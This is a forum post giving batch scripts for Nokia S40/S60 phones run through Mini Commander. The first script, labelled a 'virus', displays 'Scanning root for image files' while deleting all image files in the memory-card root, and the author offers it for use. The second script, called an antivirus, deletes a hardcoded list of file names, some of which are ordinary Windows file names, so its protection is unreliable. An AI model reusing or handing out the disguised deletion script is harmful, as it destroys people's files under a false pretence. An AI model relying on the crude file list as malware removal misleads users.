XtGem Forum catalog
This can work in both s40 and s60
to run in s40 you require
mini commander
here i'm going to explain you with a sample virus and anti viruse.......
1)open any text editor in the minicommander and
2)type like this.........
echo ...
echo Scanning root for image files
echo ...
cd /E:/
del *.bmp
del *.png
del *.gif
del *.jpg
3)rename that from .txt to .bat
this is an image deleting viruse which deletes images in mmc ie. E:// if it is in any other folder it won't deletes.................
try at your ownrisk

anti virus:

same process replace .png, .bmp etc with virus names
here is the sample file
echo ...
echo Scanning root for virulent autorun files
echo ...
cd /E:/
del arvirus.bat
del autorun.inf
del auto.exe
del autorun.ini
del autorun.pif
del autorun.vbs
del autorun.exe
del autorun.bat
del autorun.cmd
del autorun.hta
del avpo.exe
del Bha.dll.vbs
del ctfmon.exe
del copy.exe
del destrukto.vbs
del host.exe
del Heap41a
del killvbs.vbs
del KHATRA.exe
del host.exe
del imvo.exe
del Macromedia_Setup.exe
del mmc.exe
del msvcr71.dl
del ntde1ect.com
del nideiect.com
del ntdelect.com
del oso.exe
del Ravmon.exe
del RavMonE.exe
del RVHost.exe
del spoclsv.exe
del soundmix.exe
del svchost.exe
del semo2X.exe
del tel.exe.vbs
del utdetect.com
del windows.scr
echo ...

;save it and rename it from .txt to .bat and run using minicommander
antivirus by satyajit sahoo....modification by arjunkr